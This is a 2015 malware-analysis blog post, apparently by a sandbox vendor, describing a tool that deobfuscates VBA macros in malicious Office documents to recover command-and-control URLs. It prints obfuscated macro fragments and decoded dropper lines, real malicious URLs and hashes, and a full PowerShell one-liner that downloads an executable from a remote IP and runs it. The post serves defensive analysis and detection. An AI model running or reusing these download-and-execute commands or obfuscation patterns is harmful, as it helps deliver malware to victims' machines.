Saturday, March 14, 2015

Analyzing obfuscated VBA macros to extract C2 IP/URLs regardless of runtime behavior

Introduction

Lately, we have been seeing quite a lot of Office documents (or XML files with embedded Office documents, etc.) that have embedded VBA macros on our malware analysis service, which try to drop Dridex or similar. Internally, we use olevba (thanks for this great tool to Philippe Lagadec, by the way!) to extract the VBA macro source code. Sometimes though, the Word file does not "trigger" (as it might include some VM detection code, requirement incompatibilities, etc.) so that in order to extract something useful like a C2 IP/URL nevertheless, we are left with static analysis techniques and an often heavily obfuscated macro source. Here's an example:
Function \xe2\xe0\xfb\xe2\xc0\xc0\xfb\xe2\xef\xfb\xe2\xe0(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean

\xcf\xd0\xfb\xe2\xe0\xc0 = 
\xce\xf0\xe2\xe0\xe0\xcc\xd0\xce\xeb\xe2\xef\xe2\xe0\xef(0&, 
z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)

Set \xe3\xed\xc3\xd8\xc0\xcf\xf8\xe2\xfb\xe0 = 
CreateObject(QSzFZhQCxywB(Chr$(83) & Chr$(132) & 
Chr$(104) & Chr$(55) & Chr$(101) & Chr$(87) 
& Chr$(108) & Chr$(89) & Chr$(108) & 
Chr$(131) & Chr$(46) & Chr$(133) & Chr$(65) 
& Chr$(52) & Chr$(112) & Chr$(97) & 
Chr$(112) & Chr$(61) & Chr$(108) & Chr$(117) 
& Chr$(105) & Chr$(47) & Chr$(99) & 
Chr$(110) & Chr$(97) & Chr$(122) & Chr$(116) 
& Chr$(59) & Chr$(105) & Chr$(75) & 
Chr$(111) & Chr$(54) & Chr$(110) & Chr$(115)))"
As we can see (even with VB syntax highlighting ;-) it is not very human friendly and applying a regex to pull an URL will not work either. In order to understand the VBA source better (and possibly apply some patterns), we would need to resolve e.g. the Chr$() calls, the ampersands, concatenate strings and so forth. As this is a pretty straightforward and "dumb" and "time consuming" manual process, we had an idea: why not do try to automate these kind of tasks - after all this is crying for a computer program to process. So we developed a small "simplifier" engine/algorithm that does some multi-passes through the various VBA functions to resolve and concatenate strings (and a little bit more). Additionally, we implemented some semi-intelligent brute-force mechanisms to extract URLs from the "simplified source code", as some of them are often padded with trash bytes or other simple algorithms.

Here is a "before/after" example to make this "simplification" a bit more understanding.

Before

URLLSK = "www.asivamosensalud.org/images/log"

STAA = "savepic.su/5238122"

STAB = "savepic.su/5233002"

...

Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\W" + "indows\T" + "emp" + "\" + VBTXP + Chr(34)Print #Kasdwq, "pin" + "g 2.2.1.1 -n" & " 2" + ""

Print #Kasdwq, "" + "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + Chr(Asc("x")) + Chr(Asc("e"))

...

Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + URLLSK + "." + Chr(Asc("j")) + Chr(Asc("p")) + "g" + Chr(34)

Print #FileNumber, "statRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + STAA + "." + Chr(Asc("p")) + Chr(Asc("n")) + "g" + Chr(34)
    

After

Print #Kasdwq, "cscript.exe "c:\Windows\Temp\adobeacd-updatexp.vbs""

Print #Kasdwq, "ping 2.2.1.1 -n 2"

Print #Kasdwq, "c:\Windows\Temp\444.exe"

...

Print #FileNumber, "strRT = "http://www.asivamosensalud.org/images/log.jpg""

Print #FileNumber, "statRT = "http://savepic.su/5238122.png""

While the above example is a rather simple one, it still shows the basic principle and even includes a variable "constant propagation" kind of algorithm (see "URLLSK" and "STAA" in the "Before" code).

 

In Practice

Of course, we have been testing our new simplification algorithm and ran it against a few malicious Word documents, especially those that do not "trigger" (i.e. successfully start downloading files). The "non-triggering" samples are the most interesting, as those that execute successfully contain the alleged C2 URLs and IPs anyway. In the following, a few real-world examples with the corresponding malwr reports to underline that both systems did not trigger and/or show any network traffic.

 

Example 1

SHA256: 475aa057202c98a0eab161e1d073390b34312565f98efb6c527c01791805523b
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 2/57 (Sophos, TrendMicro) on 13/03/15, 19/57  on 14/03/15
Decoded URL: hxxp://95.163.121.186/api/gbb1.exe

 

Example 2

SHA256: 9683b0eed6bdb1f16607a9cac5c72af2a69839bb591d5f8bfd3efc3963b292c0
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 1/57 (Ikarus) on 13/03/15, 23/57 on 14/03/15
Decoded URL: hxxp://accalamh.aspone.cz/js/bin.exe

 

Example 3

SHA256: 8e6bb148ffc0e18c0450a89f7b0ba729a28eb22da12fd3f69d18daa85fd09024
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 1/57 (CAT-QuickHeal) on 16/02/15, 35/57 on 14/03/15
Decoded URL: hxxp://91.220.131.28/upd2/install.exe

When you take a look at the Hybrid-Analysis reports running with the new VBA processing capabilities, then you will see extracted C2 URLs/IPs as a "Found URL in decoded VBA string" signature in the malicious section at the top of the report. This is how it looks:


Of course, the presented simplification will not always yield the desired result, especially when malware authors adapt and introduce more complicated obfuscation techniques. As always, it is a bit of a cat and mouse game. Thus, we will be observing samples being submitted and try to adapt, if we can and if it's necessary. The current version works, but it is at the same time also a "proof of concept" to underline that there's a lot of room for improvement.

Conclusion

In our opinion we can make at least the following conclusions:
  • static analysis in the context of malware analysis can be very important, if we are a little bit more intelligent about it
  • from the small AV benchmark (see VirusTotal results above): we can say that about 1/3 of AV vendors seem to react quite quickly to new threats within 24 hours and/or day(s), while about 2/3 of AV vendors seem to react within the first couple of weeks, but a lot of vendors seem to have issues if it's a zero-day Word document, although it would be possible to detect malicious characteristics using pure static analysi
///

Update: small "add-on" to the decoding technique presented above. We have been getting some samples that try to hide URLs and other interesting strings using a simple hex-encoded ASCII string. Here is a good example:

https://www.hybrid-analysis.com/sample/83758075cd5d2538d77cb5b723fab1656455f0639f59d59898b23fb593bf3871

If we scroll down to the "Contains embedded VBA macros" and uncollapse the signature, then we can see the following VBA code:


The decoded String is actually:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://193.26.217.197/instana/vsacz.exe','%TEMP%\BKHkjgkKKJdf.cab'); expand %TEMP%\BKHkjgkKKJdf.cab %TEMP%\BKHkjgkKKJdf.exe; start %TEMP%\BKHkjgkKKJdf.exe;

Ouch! ;-)

We updated our algorithm to now also decode these kind of strings and forward them to the behavior signature interface (thereby triggering string related signatures and detecting the URL).

///

Contact us or learn more about VxStream Sandbox - Automated Malware Analysis.